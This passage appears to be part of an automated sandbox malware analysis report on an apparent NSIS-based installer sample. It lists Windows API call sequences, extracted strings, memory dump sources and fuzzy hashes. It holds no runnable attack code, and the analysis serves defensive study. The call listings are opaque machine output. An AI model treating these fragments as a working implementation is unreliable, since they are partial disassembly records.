                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                              • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                              • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                              • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A
                                            • API String ID: 2624150263-3554254475
                                            • Opcode ID: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                            • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                            • Opcode Fuzzy Hash: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                            • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402F42
                                            • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                            • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                            • GlobalAlloc.KERNEL32(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                            Strings
                                            • soft, xrefs: 0040301F
                                            • Inst, xrefs: 00403016
                                            • 8TA, xrefs: 00402FBF
                                            • Null, xrefs: 00403028
                                            • Error launching installer, xrefs: 00402F81
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: 8TA$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                            • API String ID: 2803837635-1977864323
                                            • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                            • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                            • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                            • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
                                            • GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,00429C68,00000000,00405409,00429C68,00000000,00000000), ref: 00406468
                                            • SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064C7
                                            • CoTaskMemFree.OLE32(00000000,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064D0
                                            • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064F4
                                            • lstrlenA.KERNEL32(0042DFC0,?,00429C68,00000000,00405409,00429C68,00000000,00000000,?,76D523A0), ref: 00406546
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406423
                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064EE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 4024019347-730719616
                                            • Opcode ID: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                            • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                            • Opcode Fuzzy Hash: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                            • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                            • GetSysColor.USER32(00000000), ref: 004043EF
                                            • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                            • SetBkMode.GDI32(?,?), ref: 00404407
                                            • GetSysColor.USER32(?), ref: 0040441A
                                            • SetBkColor.GDI32(?,?), ref: 0040442A
                                            • DeleteObject.GDI32(?), ref: 00404444
                                            • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                            • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                            • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                            • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                            APIs
                                            • lstrlenA.KERNEL32(00429C68,00000000,?,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                            • lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                            • lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,76D523A0), ref: 0040542D
                                            • SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                            • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                            • Opcode Fuzzy Hash: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                            • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                            • GetMessagePos.USER32 ref: 00404CA3
                                            • ScreenToClient.USER32(?,?), ref: 00404CBD
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                            • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                            • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                            • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                            • MulDiv.KERNEL32(?,00000064,?), ref: 00402E90
                                            • wsprintfA.USER32 ref: 00402EA0
                                            • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402E9A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                            • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                            • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                            • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                            • wsprintfA.USER32 ref: 00406697
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004066AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                            • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                            • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                            • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $=q$$=q$$=q$$=q$$=q$$=q$$=q$$=q
                                            • API String ID: 0-2436140977
                                            • Opcode ID: a50d069f957c4f7c543baea107376bd17d1562c061557668a915f6894cfbe66d
                                            • Instruction ID: 188564d04d31ff8b533b4b67ddef1d6295471fc6a62c6c99b00b86748c7d4a97
                                            • Opcode Fuzzy Hash: a50d069f957c4f7c543baea107376bd17d1562c061557668a915f6894cfbe66d
                                            • Instruction Fuzzy Hash: 6691BE74A20249DFEB08DFA4D655B7EB7B2BF88354F108429D809BB340DB39AD45CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .5Uq$$=q$$=q$$=q$$=q$$=q$$=q
                                            • API String ID: 0-372833896
                                            • Opcode ID: 41f678212fd49726291e1060fda2a1faf64fa8753d037916fdf27eb69243f4ad
                                            • Instruction ID: 2db94d27e09579470d72bde84772332b249921dd43ca7a4b7c8f163507b76ab5
                                            • Opcode Fuzzy Hash: 41f678212fd49726291e1060fda2a1faf64fa8753d037916fdf27eb69243f4ad
                                            • Instruction Fuzzy Hash: 8BF17F34A10244CFDB19DFA8D594A5EB7B3BF88305F208528D819AB395CF36EC46CB91
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                            • GlobalFree.KERNEL32(?), ref: 004028C9
                                            • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                            • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                            • Opcode Fuzzy Hash: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                            • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 551687249-2449383134
                                            • Opcode ID: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                            • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                            • Opcode Fuzzy Hash: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                            • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                                            APIs
                                            • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,76D53410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                            • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,76D53410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                            • CharNextA.USER32(0000000C,?,76D53410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                            • CharPrevA.USER32(0000000C,0000000C,76D53410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: *?|<>/":
                                            • API String ID: 589700163-165019052
                                            • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                            • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                            • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                            • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017BD
                                            • CompareFileTime.KERNEL32(-00000014,?,0040A430,0040A430,00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017E7
                                              • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,76D523A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 1941528284-0
                                            • Opcode ID: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                            • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                            • Opcode Fuzzy Hash: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                            • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                                            APIs
                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CloseEnum$DeleteValue
                                            • String ID:
                                            • API String ID: 1354259210-0
                                            • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                            • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                            • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                            • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401DA3
                                            • GetClientRect.USER32(?,?), ref: 00401DF1
                                            • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                            • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                            • DeleteObject.GDI32(00000000), ref: 00401E45
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                            • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                            • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                            • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                            APIs
                                            • GetDC.USER32(?), ref: 00401E5D
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                            • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                            • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
